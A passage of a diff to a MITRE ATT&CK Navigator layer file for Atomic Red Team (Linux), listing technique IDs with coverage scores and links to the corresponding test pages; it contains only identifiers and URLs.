ID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"commen
t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled"
:true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"
comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/at
omic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/mast
er/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-t
eam/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcana
ryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator 
Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1
027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","sc
ore":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score
":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"
T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T10
98","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1176","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-re